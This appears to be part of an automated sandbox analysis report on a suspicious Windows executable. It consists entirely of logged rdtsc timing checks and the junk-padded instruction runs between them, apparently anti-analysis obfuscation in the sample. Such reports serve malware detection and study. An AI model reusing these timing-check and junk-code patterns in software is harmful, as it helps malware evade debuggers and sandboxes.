      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FD362 second address: 2FD36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA458C36916h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2FD36C second address: 2FD370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3018D0 second address: 3018DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 304B8D second address: 304BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA4591E837Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 28049E second address: 2804E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA458C36922h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007FA458C36916h 0x00000016 ja 00007FA458C36916h 0x0000001c popad 0x0000001d jmp 00007FA458C36924h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2804E2 second address: 2804E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2804E6 second address: 280516 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA458C36916h 0x00000008 jmp 00007FA458C36925h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007FA458C3691Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3043F7 second address: 304404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 304404 second address: 30440B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 30440B second address: 304437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8383h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FA4591E8382h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3045AE second address: 3045B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3045B6 second address: 3045CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4591E837Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3045CD second address: 3045D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA458C36916h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3045D7 second address: 3045F9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA4591E8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA4591E8383h 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3045F9 second address: 304607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA458C36916h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 304607 second address: 304626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4591E8389h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3048A9 second address: 3048AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3048AD second address: 3048B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3071A5 second address: 3071D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA458C3691Ch 0x00000009 pop esi 0x0000000a jg 00007FA458C3692Eh 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 306D22 second address: 306D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Dh 0x00000007 jmp 00007FA4591E8385h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jl 00007FA4591E8376h 0x00000015 jc 00007FA4591E8376h 0x0000001b pop edi 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 306D56 second address: 306D61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007FA458C36916h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 306ECD second address: 306ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 306ED2 second address: 306EF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36920h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 26DCDF second address: 26DCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 26DCE3 second address: 26DCE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 309F1D second address: 309F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 30E10B second address: 30E116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 30E116 second address: 30E139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4591E8389h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 30E454 second address: 30E492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FA458C36916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FA458C36927h 0x00000014 pop esi 0x00000015 jnc 00007FA458C36922h 0x0000001b jmp 00007FA458C3691Ch 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 30E492 second address: 30E498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 315D0C second address: 315D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 314981 second address: 31498F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA4591E8376h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0C05 second address: 2C0C12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0C12 second address: 2C0C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0C16 second address: 2C0C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA458C36922h 0x0000000b popad 0x0000000c nop 0x0000000d or ecx, dword ptr [ebp+122D2DECh] 0x00000013 mov ebx, dword ptr [ebp+1248ACC1h] 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FA458C36918h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 sub ecx, 65FD05CBh 0x00000039 add eax, ebx 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FA458C36918h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 mov cl, 86h 0x00000057 mov dword ptr [ebp+12463D6Ah], edi 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 jo 00007FA458C36916h 0x00000067 pop ebx 0x00000068 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0C98 second address: 2C0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub ecx, dword ptr [ebp+122D2A0Fh] 0x00000013 push 00000004h 0x00000015 nop 0x00000016 jnl 00007FA4591E8398h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0CB8 second address: 2C0CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2C0CBC second address: 2C0CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007FA4591E8383h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3159F8 second address: 3159FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3159FC second address: 315A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ebx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 319098 second address: 31909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 31909C second address: 3190B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8387h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3190B7 second address: 3190C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA458C36916h 0x00000009 jng 00007FA458C36916h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 276173 second address: 276199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 320E1B second address: 320E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 320E1F second address: 320E2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FA4591E8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 320E2F second address: 320E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 320E33 second address: 320E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 26F744 second address: 26F75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA458C36916h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FA458C3691Ch 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 26F75E second address: 26F763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 31F1CB second address: 31F1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 31F1D2 second address: 31F1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jnl 00007FA4591E837Eh 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 31FFEA second address: 31FFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 31FFEE second address: 320000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FA4591E8376h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 320000 second address: 320007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 320871 second address: 32089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FA4591E8378h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA4591E8387h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 32089C second address: 3208C7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA458C36916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA458C36929h 0x0000000f js 00007FA458C36922h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3208C7 second address: 3208CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3208CD second address: 3208D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 325E4C second address: 325E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 325E59 second address: 325E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FA458C3692Bh 0x0000000b jnl 00007FA458C3691Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jnp 00007FA458C36916h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3250D9 second address: 3250DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 32523C second address: 325259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA458C3691Eh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 325259 second address: 325277 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007FA4591E8398h 0x0000000d pushad 0x0000000e jmp 00007FA4591E837Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3256EA second address: 32570B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA458C36922h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 32570B second address: 325711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 325711 second address: 32571E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA458C36916h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 332E14 second address: 332E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8383h 0x00000007 jc 00007FA4591E8378h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 332E3A second address: 332E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 332E3E second address: 332E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FA4591E8376h 0x0000000e jmp 00007FA4591E8388h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 333105 second address: 333109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 333269 second address: 33327A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA4591E837Ch 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33327A second address: 333291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA458C36923h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 333724 second address: 33372C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33372C second address: 33373D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA458C36916h 0x0000000a je 00007FA458C36916h 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3338CD second address: 3338D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33406F second address: 33407B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FA458C36916h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33407B second address: 33407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33407F second address: 33409B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FA458C3691Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33409B second address: 3340A7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA4591E8376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3340A7 second address: 3340AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33250F second address: 332515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33A397 second address: 33A39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33A39D second address: 33A3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33A3A1 second address: 33A3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33A3A5 second address: 33A3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4591E8382h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33A571 second address: 33A577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33A577 second address: 33A57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 33A6DF second address: 33A6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 34A043 second address: 34A04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
